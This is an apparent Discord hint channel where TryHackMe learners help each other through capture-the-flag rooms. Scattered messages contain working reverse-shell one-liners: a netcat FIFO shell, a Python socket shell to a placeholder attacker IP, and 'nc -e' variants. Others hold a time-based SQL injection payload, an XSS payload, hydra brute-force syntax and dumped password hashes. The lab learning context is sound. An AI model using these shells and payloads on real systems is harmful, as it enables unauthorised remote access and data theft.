Hello everyone, I need some of your advice completing this room https://tryhackme.com/room/crackthehash I managed to complete the first 3 hashes pretty easily using John but I'm stuck on the 4th one (bcrypt). I'm running a Kali VM and this command has been running for 12 hours: john hash2.txt --wordlist /usr/share/john/rockyou.lst -rule=single --format=bcrypt
I'm just wondering if the task itself is supposed to take that much time or if I'm doing something wrong
#room-hints
Shrink your input space
And it'll be slow if your hardware is.
You can get a good 100 H/s on CPU or GPU
okay.. I really need some knowledge on re
@indigo ridge I would suggest you do the rooms Reverse Engineering, Reversing ELF, Intro to x86-64 and radare2 before even touching the bof1 room..
@stuck fractal Yeah my machine only has 2 GB of RAM and 2 cores for processing, could that be an issue?
I could try running Kali as a bootable USB instead of a VM so I actually use all my hardware
You can run hashcat or John on the host
Rather than in a VM
Filter the input to 4char passwords or bruteforce
Sorry I'm kinda new, how could I filter the input?
Can't seem to find an option with john --help
I'm having a bit of a time finding the answer to question 8 in the Investigating Windows room. Question is "What port did this file listen locally for?" I've looked through the powershell scripts to see if there were any designated ports and also through event logs and pfirewall logs to see if anything was captured but I'm getting nowhere. Any help is appreciated.
@hexed moat
Anyone have the answer for CC: Pen Test Section 5 question 6? I have spent an hour running sqlmap but the network is so slow that the machine crashes before It dumps the database
Anyone have time for help on 'Hacking with Powershell'. Some questions I do not understand what answer is expected
@boreal yacht It shouldn't take that long, are you sure you're doing it right?
@white salmon I'm running sqlmap -u IP --dump-all --forms
From memory that should be fine.
It's a while since I did that part.
Mind if I DM you?
Thats fine
Sorry to bother everyone, I'm running the beginner course and I'm at flag 5 of the linux challenges. I think I know how to use find but the problem I'm having is that it's printing a huge list of permission denied. So much so that it doesn't even list the whole thing and I can't manually find what I'm looking for from the list. I've tried "find / -name flag5 2>dev/null" but it still prints the whole list.
Is there any chance someone could point me in the right direction?
you're missing a / in dev/null, shouldn't it be 2>/dev/null ?
I haven't been through it, just looking at your command line
Oh sorry I mistyped there, I did put the / in there when I ran it
ok
Show a screenshot?
Sure, one second
Hmm it's not actually printing anything now for some reason, does this mean i'm not permitted to access the file?
It means find can't find it
You can't list the contents of a dir if you don't have X on the dir
So you can maybe try switching user
Ahh thanks, I'll try that now
Hmm couldn't find it in the other user either
The hint just says to use the find command
aaa pls hint on hatter in wonderland privesc
I'll keep linking it, because it's really good
@white salmon basic enumeration
I think you might do something better with the time than wasting it in asking riddles that have no answers.
kekw
james what is that ?
I've tried piping it with grep but I still can't find it
Oh nevermind! "find / 2>/dev/null | grep flag5" did the trick
I'm currently working on the introductory research room and I am stuck on the question
"If I wanted to exploit a 2020 buffer overflow in the sudo program, which CVE would I use?" I have searched the tag "buffer overflow" in the exploit database and all 3 results that are in 2020 have no CVE. I'm not looking for an answer, just a nudge in the right direction
You're searching the wrong thing
Oh actually, are you getting the CVE from the text at the bottom of the page?
@proper temple It's sneaky. The vulnerability was discovered in 2019, but released in 2020
I'm accessing the database through google chrome and the CVE is at the top of the screen (well in my scenario it is appearing as N/A). I could send a photo to better explain if you wish?
Ah okay that makes much more sense
in the room Injection any hints for last "task5" ?
use find command
ha ha @glossy basin thank you, I didn't see the hint, would have saved me some time.. thx.
nice
Please remove spoilers. And it's not working because you're not the correct user. @north moat
can i dm @wraith marsh
No, there's enough help in here.
what does spoiler mean?
Things that spoil the room for other people. Answers, flags, solutions.
Anything you worked for that other people might want to figure out for themselves.
advent of cyber is out of service? Cause I have been waiting like 10 minutes but the first task is not getting ping
I'm stuck at the last task of the pepega box , can anyone help ?
@rotund skiff Hi, I saw you were asking what 2> /dev/null meant. I solved task 43 for learning linux thanks to you. 2> is just a way of forwarding everything that went wrong. Typing > is the same as typing 1> where 1 is stdout (standard output), and if you type 2> you forward every stderr (standard error) towards the destination you typed, /dev/null. It's just a way of handling errors. If this didn't make it any clearer, read about standard streams (also sent this over DM)
@wraith marsh thanks, finally I got root on wonderland
also sent this over DM
While I was not the person that you DM'ed, I ask you that you please read rule 1 in #rules
not every box responds to pings
@wooden mist i forgot the vpn #facepalm
It's fine, now you do
Yes, thanks
Task 20 #9 in ccpentesting is basically impossible because it doesn't tell you which order to put the options in
in ignite room I got ||python script but when running commands it is shown in raw html|| any idea how to fix this ?
Hey all, could I please get a tip for Linux Challenges Task 5 flag 33 - I've checked
||/usr/local/bin
/usr/local/sbin
/usr/bin
/usr/sbin||
etc. I can't see it :/
@surreal kite try reading this: https://opensource.com/article/17/6/set-path-linux
@surreal kite you can ask me here anything you like
I shall delete
DM me if you want some help at this point
maybe use shell instead of binary :/
@stuck fractal May I DM you? (Need some help in wonderland)
No @tardy beacon
hey I think I got command execution from teaParty.. but the command is running as rabbit.. so what should I do? How do I make it hatter?
Then you haven't done it right
.. I used ||bof|| in it and then the command gets executed in the next line.. is it right?
Look very closely at the code
i used ghidra.. and saw the c code.. only main function
Yep. Ghidra/Cutter will give you more or less the exact source code
Understand what's happening, and you'll understand why it doesn't work
I think it is related to date time thing.. ?
okay
Depends what stage you're at
Ps he wrote the box
did I miss something on wonderland. I was able to access another user's directory to run a binary as the initial user on Friday, but now it is blocked today?
@torn mural That was a bug
gotcha, so I need to priv esc to that user that has the binary?
You need to privesc everywhere
@white salmon Don't spoil the box.
It's a huge spoiler
You can rephrase the question to be more generic
@ripe hedge No they literally dumped the method in here
@stuck fractal is it okay to DM? To explain my previous message
@warm schooner yup
Is there anyone that can give me a nudge on the third flag in Python Playground?
Hello, I am currently on "xss" box,
On task 8, challenge 2
I have successfully popup alert, but the key is not shown
(as mentioned by NinjaJc01, it is a known issue)
Input value || <IMG SRC="/" onerror='alert("Hello");'> ||
Any hint to solve the challenge in other way would be much appreciated.
Any chance I could get the smallest nudge on flag2 for PythonPlayground? been looking for about 3 hours now 
Ah, thanks Hydragyrum. Managed to solve it.
3 and 4 are looking for something very specific, I haven't found it yet
do you have the creds?
@wooden mist Nope, only user. Can I DM for a sanity check?
I think I know the username, but no idea where the pass is
@ripe hedge For challenge 3 and 4, somehow I managed to retrieve the flag without actually printing "Hello"
I got the xss in 10 different ways with no flag
Then for challenge 3 and 4,
Injecting || <img src="." onmouseenter=alert("Hello");> ||
Gives me success = true, even though it pops up nothing.
I ...did that
Without the || "."|| Though
I'll try tonight
Debugging unit tests now...
Yeah good luck elf
no
finish kenobi
i cant i dont have mount
GL Elf
ty
ninja sent you the required package yesterday
uh
This is the hardest box I've done so far I think 
5 sec
Couldn't get anything to return on Gobuster for Python Playground lel
5 wordlists later
I found the playground, but the blacklist seems to hate me 
Check the gobuster parameters, there's a crucial one.
I'm still trying to get creds for 3/4 hours :/
||don't check for directories||
||check for file types instead?||
Do you need to know the hash value as you already have the window.location?
A friend told me that it's important, I'm on that phase as well @warm schooner
lmao that's cool
Because I hate JS I might just throw hydra at it
Yeah, the JS is annoying
@tidal sedge hard to identify
I'm giving up for now, if it is that, I have no idea where to start
Oh it's a custom hash, just have to reverse the JS
Yeah
But I hate JS
I could just try to reverse the order that it's hashed in but hydra sounds more fun
lmao hydra
Flag 3 hint?
Any hints for Hacktivity- Learning Linux, Task-21?
I am not getting what is to be done
use what you learned in 18
what are we supposed to do in this task I am confused about that. Do we need to create a file for checking environment variable values or is there some file already present which we need to run to find password like task 11
no just create the environment variable
@hazy thorn Create thing, run binary, get password
Make sure you're in your home directory
Yeah that
@warm schooner you mean extensions ?
Mean the same thing
its not working tho
@white salmon ||You are searching for the wrong extensions.||
Finding the page is the ez bit haha
i literally don't know how to do this lol
Is Python Playground rated hard because of flag3? Because I'm lost and in hindsight the first two flags were not that much more difficult than other rooms that are rated medium or less. I could need a hint.
ive been staring at privesc all day now
@spiral stag I've been the same for creds
@wraith marsh i think i already figured out how to get the creds
Oh ffs. I think I know what needs to be done, just no idea of the how
@white salmon @ripe hedge @stuck fractal I created test1234 as env var and assigned it $USER but on running the binary it gives `cat: /etc/shiba/shiba3: Permission denied`
no creds needed for 1st flag tho
python playground @wraith marsh
@spiral stag I got flag1
ah ok
Python ||read directory? Guessing /home/connor/||
Python ||read directory?||
@warm schooner || gangstas pop shells ||
w00t w00t
Couldn't get an rs to work
||plz hint||
The playground returns security threat when trying to do an rs
not always
@hazy thorn Terminate and redeploy, you broke the binary
@warm schooner try a different approach, I got a full tty
please hint on ||admin.html login page idk how to deal with the hash thing||
linear operations
@white salmon its all there
@lusty wigeon i don't know math.
YES
no math needed tho
||when i saw the sc i was like tf do i do||
but i don't know how to make it in python
I'm pretty lost there too, given up now
i don't even understand js
Huge spoiler: Use python
wow ty sherlock
use python for what 
@stuck fractal Thanks got it now
to re hash? @wooden mist
idk how to do it tho :Joy:
use cython
python++
i can use c then lol
Python#
python bad slow
its still not helping me how to do this tho
thats how i feel as well
but still even if i figure it out im gonna do it in c cuz i want to practise it
Trying RS, pty and reading directories, all return security threat
Gonna try to obfuscate some python
Think about what could be causing the error
internet?
The playground doesn't seem to like ||imports||
pebkac
pebkac
@spiral stag What about standing desks?
a pebkac error cannot occur by definition if the user is standing
i searched.. I found out only relative path could be exploited
@stuck fractal Just finished. Great room!
@indigo ridge Then there's your answer
anyone know learn linux task 43
how to find password for nootnoot
any hints on how to research for the root step on vulniversity? I am supposed to get advantage from the || SUID bit of /bin/systemctl || to get root, but I have no idea what to put in the web search form.
Try exactly that. What you just put as a spoiler, research that
Gtfobins is a great resource for that kind of privesc
@cold tulip You can find a youtube video about it
@cold tulip also ask on one channel before spamming on the others
@oblique cliff okay dude got panicked
sorry
Np now you know
@white salmon well it does not show the reason
i want the reason
for searching in the specific file
or dir
thank you!!!
@cold tulip the walkthroughs will show you what to do and some/most will explain why
@grand rune this is some site?
@oblique cliff where can i access these walkthrough
YouTube doesn't have these
!writeup zthlinux
i mean informative one
That's very informative
In rooms there's always a walkthroughs tab
poor ol' muirl
Brutal
DM the tryhackmebot using !verify and your token from your profile
nope, replace the brackets <> with your token
@steady stratus You dudes are greatttt
Just to confirm the obvious because I have no entrypoint at all so far... Is flag3 on Python Playground a Python related privesc?
@white salmon Thanks for the tip, the room is definitely buggy
@potent vale I dont think so, but still stuck on the second flag so dont know really
Anyone have some hints on python playground? I managed to get the first flag but the second flag got me stuck for hours...
Did you check the hint at the second flag already?
@limber quarry same here
Hint is pretty good, i knew what i had to do shortly after
@white salmon @limber quarry pm me
Coming
any hints on getting root on python playground
stuck at the same place
when i try to upload php-reverse-shell.phtml in vulniversity, then it says this message:
WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)
any help?
You weren't listening properly
check your host firewall rules?
@viscid egret Are you attacking from a kali VM?
no
Did you correctly edit the reverse shell?
Correctly meaning putting your VPN IP in there
yes!
This is why we use kali
in room: Injection | Task 5 | #1 I can't get a reverse shell from the OS injection, why?
@random wraith https://www.youtube.com/watch?v=53zkBvL4ZB4
I try to answer every question I get. Unfortunately a lot of them are extremely low effort and waste my time. I love to help, but please put some work into your question.
okay @solemn smelt
i tried to get a reverse shell using nc -ip -p -e /bin/bash
but i get nothing can't figure what exactly is the issue
did you setup your netcat listener on your attacker machine
yea sure
thats a yes or no, not sure?
yes
are you running the vpn on the vm or your host
on my host
it needs to be on your vm or the reverse shell will not work
you mean the vpn config of THM ?
yes
nah thats running on my vm
is running on my kali vm
i already completed the room but still the root flag which needs r****** sh***
did you set the ip and port in the command it seems you didnt from what you posted
yea i set the ip and port
did you use your tun0 or eth0 ip?
tun0
what port
are you sure thats the right exploit to use?
connect with : nc (vpn ip) (port) -e /bin/bash
well i think so its an os injection
that doesnt mean the web server is vulnerable to that I would enumerate more because you more than likely arent using the right exploit
@random wraith i used perl reverse shell, others don't work for me
@white salmon thanks
I reckon mkfifo /tmp/f; cat /tmp/f | /bin/sh 2>&1 | nc <tun0-ip> <open-port> > /tmp/f would work. I used that, from memory
If perl works, go for it
@random wraith other way works for me was upload php reverse shell
@inland onyx oh alright gonna try that ty
That should be your go-to netcat reverse shell for Linux, by the way -e works on precisely one version of netcat, and there are lots of versions
A FIFO will nearly always work, if netcat is installed and the firewall allows
@inland onyx thanks, that info is really helpful
Np
Hello, dumb question but, for the vulnversity gobuster question, I can't find the wordlists we are supposed to use, since I don't have the Kali Linux machine
No such thing as a dumb question
Dirb and Dirbuster wordlists can be found online
Kali is the best way forward if you're just starting out though
Thanks, I just can't pay for the subscription atm, and my terminal is linux, so it all works out, I just didn't know the wordlist names
Appreciate it
lmao really?
@white salmon This channel is for room hints.
Can i get a hint for flag3 on Python Playground ?
can i please get a smol nudge for flag2 on python playground?
@frosty inlet look at the source code...
anyone knowing this hash ||(dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu)|| python playground ?
Well thats not actually a hash @sick sun
need hint to get some creds on python playground
read the code
I need some help on python playground privesc, I keep banging my head on ||mtr-packet|| but im not sure that's the way
if not, then im even more lost
it's not
||look at / closely||
its obviously something i've never seen or done before :/
@wooden mist ||dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu|| <- that is my stuck
@wooden mist im stuck to get creds in flag2 bro
I know, i just don't get your message about ||int_array_to_text||
analyze the code
and you should know what to do next
@wooden mist ok bro, I deleted it
please don't ping me each time you want to reply, I'll read the message either way
For python playground, is there an initial file or a directory that we need to find in order to get to the playground?
yes
alright
okayface, the only other thing i find is ||snap|| but that is a patched version
im so blind apparently
is there a thm room i should do to improve myself?
a room that'd help you with this one? i don't think there is one
||you probably missed a /|| if that makes sense
ayyy
@wooden mist thanks for the help!
does the hint make sense now? 
mhm
weird that that works tho
mind DMing me with your method of getting a shell from the playground? I'm curious how people solved that part
yep
Python Playground - Any hints on how to progress once we reach the playground? Have tried: RS, pty and directory enumeration. Need to look into python exploits
Just write some python, but think about what you can't do, and try doing it a different way
some python
think of ways to bypass that
^
||hardcode instead of importing?||
¯\_(ツ)_/¯
If there just was a list of functions that you can use without importing stuff in Python
I'm going to be spending all day on this stupid || JS || 
The RE does not seem fun
I don't even know where to start
From the bottom
@wraith marsh you start with reading the code
@wooden mist I've done that, and tried several things and just get junk
Will do 
Help with Room Injection Task#3 Question 1
I tried all I can, tried all the ping commands.
@potent vale Started from the bottom now we here
You know what to do I guess, just not how. I don't know how to give a hint without providing the source code which is not going to happen
If you don't know where to start "from the bottom" is the obvious answer in that task
Can I ask a question for a hint including my potentially spoiling approach here in a spoiler tag?
I could need a slight hint here, i am doing common linux privesc and am doing task 4: Q6. What critical file has had its permissions changed to allow some users to write to it? The hint says, think about where passwords are stored on linux. A slight hint on what i am missing?
Solved it but would argue the answer is wrong for what the hint is pointing towards
Finally got flag3 on Python Playground. Thanks for the hints
I'll have to check out future writeups on this one if there are other ways to claim flag1 and 3
some hint on hatter to root please..
@indigo ridge ||linpeas||
thank you everyone.. and the creator of the wonderland room. @stuck fractal after so many attempts I just rooted the box. I learned a lot.. phewwwww!!!
@potent vale thanks brother!!
What type of DNS server contains records specific to domain extensions (i.e. .com, .co.uk, etc)? Use the long version of the name.
I looked everywhere but couldn't find anything
any help :)
anyone at all?
@bitter shadow
I read it 3 times now
I mean it's in the room
Hey guys. I'm struggling with Hackpark. I'm on task 3 - trying to gain a reverse shell on this system. I have opened a netcat listener. I have uploaded the Postview.ascx file on to the webserver. Then navigated to the directory listed on the CVE but I get an error.
any ideas where i am going wrong? any hints / tips?
i have also followed the video walk-through and followed the steps exactly and still get the above error.
looks like it was a school boy error on my part. I entered the IP of Hackpark in the ascx file instead of my Kali machine and so NC could not listen.
Now working
good cuz i was trying to figure out what you might be doing wrong lol
Hackpark is only available for 1 hour....so so annoying and frustrating. Even when you try to extend the webserver stops responding.
JackOfAllTrades, is there something I'm missing? I assumed you'd be able to ||log in either to the web server or ssh with the password found in the page source and username being either Jack, jack, Johny, Johnygraves|| but none of those work
Nope, keep looking
||oo found it thanks except now idk how thats encoded||
If you get very stuck with the encoding, go search up the name you found before
Most people skip that, but there's a hint there
Hey, anyone able to help me with a room/linuxctf question?
real simple flag probably but im not sure what to look at for Flag 7
@tepid mist which room?
google for how to find the process list and then grep that for a keyword
it should jump out at you then
well there's switches on the ps command to make it show you more info
hmmm, to the man page
happy hunting
thanks
Quick question for my own, is there anything in linpeas that would help with flag3 of the Python Playground, I have gone through it more than once and it's starting to blur in front of my eyes
@median compass there is not
@median compass found it when i used BSD syntax
cheers @spiral stag
nice one @tepid mist - 'ps -aef' will usually find anything there is to be found
thanks for your help
very welcome
hmm, ||got that the hint is the stego image on the webpage for the user, but the user isnt the name of the dino itself and theres nothing in strings in the image|| any other hint for jackinthebox?
Who said it's in the stego image?
ok, I don't see anything in any of the images
i dont have too much experience with steganography, is there other stuff i should be doing to explore the images?
besides strings
Steg tools
@oblique cliff this guy has a good resource of tools https://0xrick.github.io/lists/stego/
oh, cool. thanks yall
Could someone give me a hint on python playground root. Have been stuck for hours and have no idea where to even start anymore 
@sinful garden pm
yea thats fine
@rancid crystal Hey there, question if the answer for Room "Google Dorking" Task 3 Question 3 is working ? my answer of ||85/100|| is not being accepted?
@surreal kite Your score is wrong
@steady stratus
Sorry about that. I'll fix the question when I get back from work in a few hours (probably completely rewrite it tbh) @stuck fractal @surreal kite
Of these addresses two are reserved, what is the first addresses typically reserved as?
It is currently expecting 83/100 @surreal kite
idk I tried ||gateway|| if that's what you're referring to
I also tried ||localhost||
umm
there are 2 addresses you cannot assign in an /24 network
lol
thanks
np gl!
Hello. I'm at the last step of learning linux. And managed to find the user nootnoot and pw. I'm supposed to find root.txt. But access denied on the root folder. Any hints? :)
check what nootnoot can do to escalate his privileges
man sudo
@steady stratus thank you
hey guys, i have been on the platform for a few weeks and noticed that i can do the learning linux easy rooms to boost my score (to irritate a friend with far less time than me) and i seem to be unable to input the answer to a question. i am 100% certain it is correct and have even googled answers for the room which agree with me. any known workarounds? I'm on googledorking task2 question 2
nvm, just kept clicking submit
Somehow feel like I've been going round in circles with Python playground's third flag. Any nudge is greatly appreciated
You should have noticed something if you enumerated when you got flag1. @thorny nest
Hey, has anyone solved the shodan.io room? I've solved everything except: "What is the 3rd most popular country for MYSQL servers in Google's ASN?" As shodan only shows 2 results, which are not the right ones. Searching the didn't do the trick...
Nope. Don't recall seeing anything for flag1. Though i got flag2 prior to flag1. Hmmm will take a look again. Thanks @wraith marsh
Have a go at it, if you get stuck just ping me again @thorny nest
Sure will do. Though I just might take a break. Been going round in circles.
Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh"
anyone can help with this question?
how do i specify write permissions only for group others
hi all, what things can i do if i can create files as root on specific directory ?
yeap haha, python playground related.
you might want to run a file with root permission
i would suggest reading about suid
ok @covert basalt but the user doesn't belong to sudoers
i have suggested according to python playground
ok let me learn more about that topic, thanks @covert basalt
could someone help on room ice task 3 question one
i found the answer, it is Exec Code Overflow
but the thing doesnt want to accept it
i know its that because i got the cve number right
finally, got root on python playground, great box @viscid dust, very clever! tyvm
@viscid egret if you look at the asterisks, you'll see that what you think the answer is can't possibly be the answer
hello guys
hm but i looked in the cvedetails site and that was the name
I'm on the RP. Metasploit
I hashdumped the hashes of the machine
got Dark's password,
please dont post answers
I know
oop sorry
what would be a longer version of the word exec @viscid egret
execute
maybe try that since its the right length as the answer suggests
thx
just ask your question
you haven't even said what room it's about @rose moss
ah, big gap between first question and last, my bad
can mark it as a spoiler
I got the user password
|| like this || put 2 | on each side
but the root password || was a blank ||
I enabled the rdp
but ||could not connect with a blank, how come ||
||7c4fe5eada682714a036e39378362bab:Password01!||
||31d6cfe0d16ae931b73c59d7e0c089c0:||
@oblique cliff thanks for the trick
any ideas ?
who's ||Password01!|| for?
you sure thats the name of the user?
hey im now on question 12 where i have to exploit, but it keeps failing. any ideas?
||using bypassuac_eventvwr||
if youre following the steps exactly and youre sure then terminate and redeploy
yep did that already
it says to try multiple times
but output is the same
it seems to work but doesnt create a new session
||[*] Started reverse TCP handler on 192.168.0.20:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.||
thats all it says
@viscid egret your VPN IP isn't really sensitive data and it's harder for us to diagnose if you have the wrong IP set
Lhost needs to be tun0
yep it is
Which is the vpn ip
thats not my ip
That shows 192
thats the machine ip
LHOST needs to be your VPN IP
Key tip with msf sometimes it fails to set so setting it a couple times is usually a safe bet
ok yeah that fixed it
like 6 times
it did not want to set it
or possibly 18
thx
In burpsuite room I can't find a "good request" where set cookie is set in the response so sequencer can calculate entropy, any hints ?
Are you looking in the Response tab? @mild eagle
@hexed crescent yes the only one I. Can find is for socketxxx
Re-browse the login page with credentials, intercept through, and it should provide a Set-Cookie response entry.
Did you go through all the entries in Proxy > HTTP history?
Yes and there is a lot now @hexed crescent
One thing to try, in OWASP Juice Shop, is on the login page, create a new account, and login with that new account, that should get you the Set-Cookie response entry in Proxy > HTTP history > Response sub-tab for sure.
Hey guys, I am doing the networkservices, Exploiting SMB Part, I have managed to go into the smb client but I can't seem to view any of the files or look for the owner of the folder, any guidance would be great! Cheers (I have used the -help command but I don't seem to be getting anywhere with that as well)
https://cdn.discordapp.com/attachments/692456966802374687/720019671084171294/unknown.png
I don't want the answer, just guidance on what to do next, been looking at this questions for nearly an hour
There is a document in there that stands out to me immediately.
You won't be able to view it you will need to download it.
Yeah, the Working From Home Information.txt file
@hexed crescent didn't help, strange
okay, I assume that is using get command?
Either that or mget *.
When I use either of those commands, i get this response
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Working
mate
I could cry
That should allow you to choose with Y or N which files you want.
@white salmon Thank you so much
Haha, no problem.
@hexed crescent I guess it is supposed to be the token cookie - but I don't have a set-cookie response for that one
@wraith marsh mind if I DM you?
Hello again, I am trying to ssh into a server using a private key however I am getting this returned to me:
I believed I didn't need the password due to the private key?
Which room is this?
Network Services
[Task 4] Exploiting SMB
#8
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
What is the smb.txt flag?
I could be wrong. But I think you need a different username
@paper glen Yep, as JB said, the username is wrong
Okay, thanks for that! Ill keep digging!
I think that one caught me out
Yes me too.
So I'm 99% sure I have got the right username now but once I change the file permissions for the id_rsa, it won't connect
you need to change the permission of the ssh key
It complains to you very clearly
I did that though? chmod 600 id_rsa
usernames are case sensitive
^
..
HAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHA
Linux is case sensitive
Working my way through the injection room and it asks what the user's shell is set as, does this just mean the directory it spawns in or am I missing something?
Congrats @paper glen
Congrats @paper glen
@white salmon thank you!
any nudge on python playground, I got flag1 and I have a shell on the box
but not sure where the rest of the flags are
Python shrugs
I'm sure somebody can though. :_0
Look at the hint on the room, you should have already seen what you need to do
can I DM you @wraith marsh or @white salmon , I fear I might spill some info here in the process of discussing
I don't use python so I doubt I will be any help to you. (thank you for asking first though)
Python playground is a new hard room @white salmon
Yeah you can DM me @white salmon
May I ask for any hint to get flag3 (Python Playground)?
I'm on the Linux challenge where I have to download an mp3 file to get the next flag. Is there any chance someone could give me a clue as to where I would find what port I should be connecting to?
How are you downloading it?
There are a tonne of different ways to do it
I'd be using netcat and /dev/tcp myself
Oh sorry I should have specified, I'm using filezilla
Oh there's a method of doing it in-machine?
Not listening to it
Either way you'll need to exfiltrate it
FTP and SCP are the heavyweight options though
Oooh ok. Sorry but I have a couple more questions now :L So are there port numbers that are set universally on all machines for certain purposes?
This is a list of TCP and UDP port numbers used by protocols of the Internet protocol suite for operation of network applications.
The Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP) needed only one port for full-duplex, bidirectional traffic. The Stre...
RFC 1340 IIRC
Thanks James
I got u
Ahh I was googling all wrong then, I was trying to look for what ports are open
thanks james!
For a certain number after that, they're "reserved"
After that, they're free to use
nmap -sV -v -p-
So is there a way of exfiltrating the file from this challenge without using FTP or SCP?
nc -lvnp 1234 on your own host
Ahhh interesting
Np
I'm currently doing the wgel
I did get the ||key ||but how to use it? ermmm... ||ssh -i file ip||?
owh.. I'm still lacking the username maybe..
Guess you need to keep going then
yea thanks.. I thought I'm using the wrong command for ssh
the RSA key authenticates you to the server, like a password would, but better
You still need to say who you're connecting as
probably that means don't use rockyou.txt??
using rockyou.txt
which room is this
your "pass/fail" check is probably wrong
Can we see the whole command?
I just did the room so I may be able to help you out.
@placid drift
remove the verbose flag and try again
This command should work.
@wooden mist Doesn't matter. The command should stop as soon as it hits a valid combination.
ik
yea
oh wait
should be nothing wrong with using -V
your route is wrong
the login ?
your command is wrong
oh I'm seeing something wrong here
oh damn, szy beat me to it
Is the URI wrong?
yes
hydra -l <user> -P pwlist <ip> http-post-form "/login:username .....
with verbose disabled it'd be easier to notice
Oh!
Yeah!!!!
What the hell?
So hard to spot.
But so obvious.
I have done a scan on Peak Hill.
Got 2 ports open.
Not sure what else to do.
I saw anonymous access.
Is that what I should go for?
do you see any other path you could take?
SSH brute force?
Maybe username enumeration on port 22
and then password brute.
That's all I can see now.
Maybe there's some python thing on FTP. I don't know. lol
Thanks for the hint.
Just looked up on ServerFault and had to do a "pass" before "dir"
Now I can see a file.
Thanks.
Parse through the results. What is the effective estimated entropy measured in? Do I need to enter a percentage?
hi
hi
@white salmon hey?
@white salmon hey?
@rancid crystal i wrote in wrong channel sry
Any hints for wonderland root privexec
Automated privesc scanning scripts
I did run linpeas but let me go through the output once more.
@void shoal you are more capable than you think
Noobie here (Only 1 hour in), I'm stumped on what the answer for task 12 on "Learn Linux" is.
man su
@glacial remnant Specifically for su
is it only 2 digits?
2 characters
Okay, I'm still unsure of what to enter as I've tried everything that appears when
man su
is enteres
*entered
@stuck fractal Thank you, I don't know why but I just didn't spot it
Got it?
Yup
Cool
I need some help in room Hydra - Question 1 I'm brute forcing with rockyou.txt but I just saw in hint they say || If you've tried more than 30 passwords from RockYou.txt, you are doing something wrong! ||
I use this command to brute-force on web hydra -t 4 -V -f -l molly -P rockyou.txt rdp://$ip
I'm new to the web part of hydra, I didn't actually know what I should do. I checked a blog where they were using this cmd....can I ask you for some resources?
I'm doing this room, should I use http://$ip ?
Read the material you are given in the room
It will tell you exactly how to use hydra for this
ok thanks
May I ask for any hint to get flag3 (Python Playground)?
Finally completed. Write-up is ready and will be published soon.
Can I get some help on foothold for mindgames?
Didn't it just drop?
Yes
@quiet stump tbh, the foothold is trivial. Have a look at what you're given. RE it.
I was joking dw
i rooted lordofroot
but wondering ||if there is a script to do it without sqlmap?||
even most guides used it
anyone know of a way without for the db part
I'm wondering the same @random cypress
I can't even fathom how much you'd have to script yourself to get the same result
and I'm not finding anything on github etc
So, you could find what is in the SQLi error returned by SQLmap and try to recreate it.
' AND (SELECT *
FROM (SELECT(SLEEP(5)))PWKv) AND
'eVRP'='eVRP&submit= Login
Something like that in the address bar, but adjusted to the parameters you want.
please hint on privesc in mindgames
You are not getting a hint
It's only been out a couple hours.
40 minutes
@white salmon Elf, it's literally just come out
It's a hard box
yes
any hint for the racetrack . I've got the premium feature
Something like that in the address bar, but adjusted to the parameters you want.
@patent token but my understanding is the username|| is what's vulnerable. or is that what you mean, enter it in the address bar? also where did you get that PoC? I understand it but I'm confused by your PWKv and eVRP values||
granted if this level of sqli is not on the exam for now its okay not knowing
if it is wow
I literally just copy/pasted one of the returns from sqlmap. SQLmap is using that information as an injection parameter.
For OSCP, if that's what you're referring to, will probably be more simplistic than that and throw an error or something that you can use.
ah i think i ignored its output a bit too much
just paying attention to the bright colors
thanks
I haven't finished with playground and now there's mindgames? It's like my head's about to burst
"Let people struggle"
hey I am trying to get a reverse shell on cod caper but I can't get it to send the actual shell. Any ideas?
netcat is listening
command that i sent is nc -e /bin/sh 10.2.17.239 4444
Try a different reverse shell command
i did
used bash + perl
and tried python
and telnet
even the command for if nc doesn't like -e
What was the python command you ran?
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
As well as the netcat command to listen?
You have port 80
What happens
Let's move this to #room-help
sure
Hi guys, is there a writeup or explanation for the room "Intro to x86-64"? I found the password at task 6, but I was "lucky". I think I don't have the good way to reverse it. I'm not able to find the password for Task 7, I've been stuck since yesterday
When I try to run john, it says [1] 37370 segmentation fault john shadow
any idea why?
command: john --wordlist=../Tools/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz shadow
@viscid egret firstly you need to extract the file
is it too early for hints in mindgames? lol
I assume so since james put that note in the task description about no livestreams
so is opening a reverse shell and shoving your ssh public key on a machine so you can log in via ssh and get a real shell cheating?
trying the mindgames
I do that every time I'm able to!
That's a sensible solution for mindgames
good to know
yeah I was trying to write a script to send a post to the transpiler, and then thought why am I not getting a reverse shell?
so there is a repo, pwncat, made by John's roommate Caleb; it gives you a stable shell with color and ctrl-c support. Recently I've been using that.. otherwise I used to do that as well.
bookmarked
Good morning from Australia.
Finally rooted python playground. Thanks to @wraith marsh and @white salmon for the nudges. On to mindgames!
Going to try Peak-Hill again.
Aaa pls hint on mind games privesc
Hey, working on the steganography room and I am on task 5's last question. I ran the tool and got a bin file but I'm not sure how to run it. Any suggestions?
Hi guys, I am having trouble with flag 26 of the linux challenge. I have to find a string in the whole system that starts with 4bcbe and I'm using ||find / 2>/dev/null | grep "4bcbe*"|| but nothing shows up, can someone help me get on the right way?
